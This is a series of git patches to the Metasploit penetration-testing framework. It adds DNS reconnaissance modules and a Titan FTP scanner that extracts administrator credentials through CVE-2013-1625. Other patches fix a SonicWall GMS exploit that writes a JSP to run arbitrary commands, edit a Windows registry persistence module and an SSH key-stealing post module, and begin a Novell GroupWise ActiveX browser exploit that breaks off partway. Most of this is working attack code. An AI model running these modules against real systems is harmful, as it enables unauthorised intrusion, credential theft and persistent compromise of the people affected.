false + end + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + record = {} + record[:host] = host + record[:type] = "A" + record[:address] = rr.address.to_s + results << record + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_ns(target) + results = [] + query = @res.query(target, "NS") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_txt(target) + query = @res.query(target, "TXT") + if (query) + query.answer.each do |rr| + print_good("Text: #{rr.txt}, TXT") + end + end + end + + #--------------------------------------------------------------------------------- + def get_mx(target) + results = [] + query = @res.query(target, "MX") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| + if Rex::Socket.dotted_ip?(rr.exchange) + record = {} + record[:host] = rr.exchange + record[:type] = "MX" + record[:address] = rr.exchange + results << record + else + get_ip(rr.exchange).each do |ip| + record = {} + record[:host] = rr.exchange.gsub(/\.$/,'') + record[:type] = "MX" + record[:address] = ip[:address].to_s + results << record + end + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end +end \ No newline at end of file From 256ab7f737ddf23f45741cfee9feed48658592b8 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:50:21 -0400 Subject: [PATCH 321/421] Split of DNS Reverse Lookup from enum_dns --- .../auxiliary/gather/dns_reverse_lookup.rb | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 modules/auxiliary/gather/dns_reverse_lookup.rb diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb new file mode 100644 index 000000000000..95dbb0c8ac80 --- /dev/null +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -0,0 +1,94 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Reverse Lookup', + 'Description' => %q{ + This module performs a Reverse Lookup against a given IP Range. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptAddressRange.new('RANGE', [true, 'IP Range to perform reverse lookup against.', nil]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ false, "Number of seconds to wait before doing a retry", 2]), + ], self.class) + end + + def run + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + @threadnum = datastore['THREADS'].to_i + switchdns() if not datastore['NS'].nil? + reverselkp(datastore['RANGE']) + end + + #------------------------------------------------------------------------------- + def reverselkp(iprange) + print_status("Running Reverse Lookup against ip range #{iprange}") + ar = Rex::Socket::RangeWalker.new(iprange) + tl = [] + while (true) + # Spawn threads for each host + while (tl.length <= @threadnum) + ip = ar.next_ip + break if not ip + tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| + begin + query = @res.query(tip) + query.each_ptr do |addresstp| + print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") + + report_host( + :host => tip.to_s, + :name => addresstp + ) + end + rescue ::Interrupt + raise $! + rescue ::Rex::ConnectionError + rescue ::Exception => e + print_error("Error: #{tip}: #{e.message}") + elog("Error running against host #{tip}: #{e.message}\n#{e.backtrace.join("\n")}") + end + end + end + # Exit once we run out of hosts + if(tl.length == 0) + break + end + tl.first.join + tl.delete_if { |t| not t.alive? } + end + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end +end \ No newline at end of file From ac8194ed07b18e27c8d488590c5307b539650585 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 10:09:34 -0400 Subject: [PATCH 322/421] Split of DNS SRV Record Enumeration from enum_dns --- modules/auxiliary/gather/dns_srv.rb | 221 ++++++++++++++++++++++++++++ 1 file changed, 221 insertions(+) create mode 100644 modules/auxiliary/gather/dns_srv.rb diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb new file mode 100644 index 000000000000..dd3f68f208d7 --- /dev/null +++ b/modules/auxiliary/gather/dns_srv.rb @@ -0,0 +1,221 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Reverse Lookup', + 'Description' => %q{ + This module enumerates common DNS Service Records. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptBool.new( 'ALL_NS', [ false, "Run against all Nameservers for the given domain",false]), + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 3]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 4]), + ], self.class) + end + + def run + records = [] + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") + records = records + srvqry(datastore['DOMAIN']) + if datastore["ALL_NS"] + get_soa(datastore['DOMAIN']).each do |s| + switchdns(s[:address]) + records = records + srvqry(datastore['DOMAIN']) + end + get_ns(datastore['DOMAIN']).each do |ns| + switchdns(ns[:address]) + records =records + srvqry(datastore['DOMAIN']) + end + end + records.uniq! + records.each do |r| + print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_service( + :host=> r[:address].to_s, + :port => r[:port].to_i, + :proto => r[:proto], + :name => r[:service], + :host_name => r[:host] + ) + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) + end + + end + #--------------------------------------------------------------------------------- + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + end + return results + end + #------------------------------------------------------------------------------- + def srvqry(dom) + results = [] + #Most common SRV Records + srvrcd = [ + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', + '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' + ] + + srvrcd.each do |srvt| + trg = "#{srvt}#{dom}" + begin + + query = @res.query(trg , Net::DNS::SRV) + if query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = ip[:address] + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") + end + end + end + end + rescue + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + #--------------------------------------------------------------------------------- + def switchdns(ns) + vprint_status("Enumerating SRV Records on: #{ns}") + @res.nameserver=(ns) + @nsinuse = ns + end + + #--------------------------------------------------------------------------------- + def get_ns(target) + results = [] + query = @res.query(target, "NS") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + end + return results + end +end \ No newline at end of file From e3ee0d79134137cffcb8db1b2d81be5013d61a49 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 11:25:17 -0600 Subject: [PATCH 323/421] Don't try to download '.' or '..' as files --- modules/post/multi/gather/ssh_creds.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index 60638eece62a..46966745998c 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -61,11 +61,12 @@ def download_loot(paths) end files.each do |file| - print_good("Downloading #{path}#{sep}#{file} -> #{file}") + next if [".", ".."].include?(file) data = read_file("#{path}#{sep}#{file}") file = file.split(sep).last loot_path = store_loot("ssh.#{file}", "text/plain", session, data, "ssh_#{file}", "OpenSSH #{file} File") + print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}") # If the key is encrypted, this will fail and it won't be stored as a # cred. That's ok because we can't really use encrypted keys anyway. From 5b398076ae6acb8e72e861e182c0b3c24b26e9fd Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 11:52:50 -0600 Subject: [PATCH 324/421] Couple of fixes for windows * Catch IOError when chmod doesn't exist (i.e. Windows) * Proper escaping for paths --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4013bc95738e..d46541a0cb9b 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -229,7 +229,7 @@ def exploit_native def path_join(*paths) if target['Platform'] == "win" path = paths.join("\\") - path.gsub!(%r|\\+|, "\\") + path.gsub!(%r|\\+|, "\\\\\\\\") else path = paths.join("/") path.gsub!(%r|//+|, "/") @@ -269,7 +269,9 @@ def jsp_drop_bin(bin_data, output_file) def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| - jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|try {\n| + jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| From 8798567d799f873c082278e666d740be964936db Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 8 Feb 2013 12:05:27 -0600 Subject: [PATCH 325/421] Fix bug: TypeError can't convert Fixnum into String wmap_target_port is retrieved from datastore['RPORT'], and that's a Fixnum. But wmap_base_url is treating that like a String, so when a module uses that function, it's doomed. See: http://dev.metasploit.com/redmine/issues/7748 --- lib/msf/core/auxiliary/wmapmodule.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/wmapmodule.rb b/lib/msf/core/auxiliary/wmapmodule.rb index fe55d7747e60..7af067ed3efe 100644 --- a/lib/msf/core/auxiliary/wmapmodule.rb +++ b/lib/msf/core/auxiliary/wmapmodule.rb @@ -71,7 +71,7 @@ def wmap_base_url else res << datastore['VHOST'] end - res << ":" + wmap_target_port + res << ":" + wmap_target_port.to_s res end From 9b6f2fcd1de34a0cb4bd5a9d5b25438c7d3dd3fd Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 8 Feb 2013 12:10:42 -0600 Subject: [PATCH 326/421] Use the install path to tell us the separator Fixes the java target on windows victims --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index d46541a0cb9b..397116f37a6a 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -227,7 +227,7 @@ def exploit_native end def path_join(*paths) - if target['Platform'] == "win" + if install_path.include?("\\") path = paths.join("\\") path.gsub!(%r|\\+|, "\\\\\\\\") else From b8f0a94c3fcd18f505dc8f33486a6f2d7dee05d6 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 14:42:10 -0400 Subject: [PATCH 327/421] Fixed typos mentioned by Egypt --- modules/exploits/windows/local/persistence.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 942cd8f9df89..3bf17f4fa001 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -31,8 +31,6 @@ def initialize(info={}) at user logon or system startup depending on privilege and selected startup method. - REXE mode will transfer a binary of your choosing to remote host to be - used as a payload. }, 'License' => MSF_LICENSE, 'Author' => @@ -56,7 +54,7 @@ def initialize(info={}) end - # Run Method for when run command is issued + # Exploit Method for when run command is issued #------------------------------------------------------------------------------- def exploit print_status("Running module against #{sysinfo['Computer']}") @@ -253,4 +251,4 @@ def write_exe_to_target(exe_raw, rexename) end return tempexe end -end \ No newline at end of file +end From fea84cad10dfb7c1e1d785b7d0c420aabe813557 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 14:47:16 -0400 Subject: [PATCH 328/421] Fix additional typos per recomendation --- modules/exploits/windows/local/persistence.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 3bf17f4fa001..386d6900de4f 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -123,7 +123,7 @@ def exploit ) end - # Function for Creating persistent script + # Creates persistent script #------------------------------------------------------------------------------- def create_script(delay, altexe) if not altexe.nil? @@ -159,7 +159,7 @@ def log_file(log_path = nil) return logfile end - # Function for writing script to target host + # Writes script to target host #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") @@ -182,7 +182,7 @@ def write_script_to_target(vbs,name) return tempvbs end - # Function to execute script on target and return the PID of the process + # Executes script on target and return the PID of the process #------------------------------------------------------------------------------- def target_exec(script_on_target) execsuccess = true @@ -201,7 +201,7 @@ def target_exec(script_on_target) return execsuccess end - # Function to install payload in to the registry HKLM or HKCU + # Installs payload in to the registry HKLM or HKCU #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) # Lets start to assume we had success. @@ -228,7 +228,7 @@ def write_to_reg(key,script_on_target, registry_value) end end - # Function for writing executable to target host + # Writesexecutable to target host #------------------------------------------------------------------------------- def write_exe_to_target(exe_raw, rexename) if rexename.nil? From 7522a87cf9a6d518ca8f8f017706f1a24d992248 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 8 Feb 2013 15:43:02 -0500 Subject: [PATCH 329/421] Adding an auxiliary scanner module for Titan FTP password disclosure. --- .../scanner/http/titan_ftp_admin_pwd.rb | 97 +++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb new file mode 100644 index 000000000000..0025d2a3cf54 --- /dev/null +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -0,0 +1,97 @@ +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Titan FTP Administrative Password Disclosure', + 'Description' => %q{ + On Titan FTP servers prior to version 9.14.1628, an attacker can + retrieve the username and password for the administrative XML-RPC + interface, which listens on TCP Port 31001 by default, by sending an + XML request containing bogus authentication information. After sending + this request, the server responds with the legitimate username and + password for the service. With this information, an attacker has + complete control over the FTP service, which includes the ability to + add and remove FTP users, as well as add, remove, and modify + available directories and their permissions. + }, + 'Author' => + [ + 'Spencer McIntyre' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1625' ], + ], + ) + + register_options([Opt::RPORT(31001)], self.class) + deregister_options('PASSWORD', 'USERNAME') + end + + def run_host(ip) + res = send_request_cgi( + { + 'uri' => "/admin.dll", + 'method' => 'POST', + 'headers' => { + 'SRT-WantXMLResponses' => 'true', + 'SRT-XMLRequest' => 'true', + 'Authorization' => 'Basic FAKEFAKE' + }, + 'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>", + }) + return if not res + + if res.code == 400 + vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched") + return + elsif res.code != 200 + vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}") + return + end + + xml_data = res.body.strip + resp_root = REXML::Document.new(xml_data).root + + srresponse = resp_root.elements.to_a("//SRResponse")[0] + srdomainparams = srresponse.elements.to_a("//SRDomainParams")[0] + + info = {} + srdomainparams.elements.each do |node| + case node.name + when "DomainName" + info[:domain] = Rex::Text.uri_decode(node.text) + when "BaseDataDir" + info[:basedir] = Rex::Text.uri_decode(node.text) + when "CreationDate" + info[:username] = Rex::Text.uri_decode(node.text) + when "CreationTime" + info[:password] = Rex::Text.uri_decode(node.text) + end + end + + if (info[:username] and info[:password]) + if (info[:domain] and info[:basedir]) + print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]} Base Directory: #{info[:basedir]}") + end + print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: #{info[:username]} #{info[:password]}") + report_auth_info( + :host => ip, + :port => datastore['RPORT'], + :user => info[:username], + :pass => info[:password], + :ptype => "password", + :proto => "http", + :sname => "Titan FTP Admin Console" + ) + end + end +end From 7370d7d31b0d123732f113d855c0d8dafd3b3f87 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 8 Feb 2013 18:21:06 -0600 Subject: [PATCH 330/421] Final touchup --- .../auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 0025d2a3cf54..4d18e2dc74d6 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'rexml/document' @@ -80,9 +87,10 @@ def run_host(ip) if (info[:username] and info[:password]) if (info[:domain] and info[:basedir]) - print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]} Base Directory: #{info[:basedir]}") + print_good("#{ip}:#{datastore['RPORT']} - Domain: #{info[:domain]}") + print_good("#{ip}:#{datastore['RPORT']} - Base Directory: #{info[:basedir]}") end - print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: #{info[:username]} #{info[:password]}") + print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'") report_auth_info( :host => ip, :port => datastore['RPORT'], From 166b59b61a21674ef6aaacbdd47c44868fd32454 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:48:57 -0400 Subject: [PATCH 331/421] Added new line to end of file. --- modules/auxiliary/gather/dns_info.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index bbf772cf5b32..f57fb1649f2a 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -215,4 +215,5 @@ def switchdns() @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end -end \ No newline at end of file +end + From eda3fc07157f6717f03346e2f6f914586e1396e1 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:50:23 -0400 Subject: [PATCH 332/421] Added new line to end of file. --- modules/auxiliary/gather/dns_srv.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index dd3f68f208d7..4bbccba51835 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -218,4 +218,5 @@ def get_ns(target) end return results end -end \ No newline at end of file +end + From 78f81843f6348b04715b662be5b24bf2cf8a881a Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:51:37 -0400 Subject: [PATCH 333/421] Added new line to end of file. --- modules/auxiliary/gather/dns_bruteforce.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index a6e72080a6a9..0c289eddb3a9 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -135,3 +135,4 @@ def dnsbrt(domain) end end end + From fd15436a9669884125e71fe9a01e89865b12af62 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 20:52:49 -0400 Subject: [PATCH 334/421] Added new line to end of file. --- modules/auxiliary/gather/dns_reverse_lookup.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 95dbb0c8ac80..e3e28342a678 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -91,4 +91,5 @@ def switchdns() @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end -end \ No newline at end of file +end + From 63c67914739083aa4c21acc88094bf0300ac065e Mon Sep 17 00:00:00 2001 From: m-1-k-3 <github@s3cur1ty.de> Date: Sat, 9 Feb 2013 11:17:02 +0100 Subject: [PATCH 335/421] return --- modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index feea8e0d3e4d..2c0da88e4f7f 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -60,7 +60,7 @@ def run rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return :abort + return end if res.body.include? "end" From 5b576c1ed061d30bd2b26479e22f564631d24073 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 9 Feb 2013 17:40:45 +0100 Subject: [PATCH 336/421] fix ident and make happy msftidy --- .../browser/novell_groupwise_gwcls1_actvx.rb | 309 ++++++++++++++++++ 1 file changed, 309 insertions(+) create mode 100644 modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb new file mode 100644 index 000000000000..a3f50861e8ba --- /dev/null +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -0,0 +1,309 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => NormalRanking, + :classid => "{601D7813-408F-11D1-98D7-444553540000}", + :method => "SetEngine" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll + ActiveX. Several methods in the GWCalServer control use user provided data as + a pointer, which allows to read arbitrary memory and execute arbitrary code. This + module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The + JRE6 needs to be installed to achieve ASLR bypass. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0439' ], + [ 'OSVDB', '89700' ], + [ 'BID' , '57658' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 1040, + 'DisableNops' => true + }, + 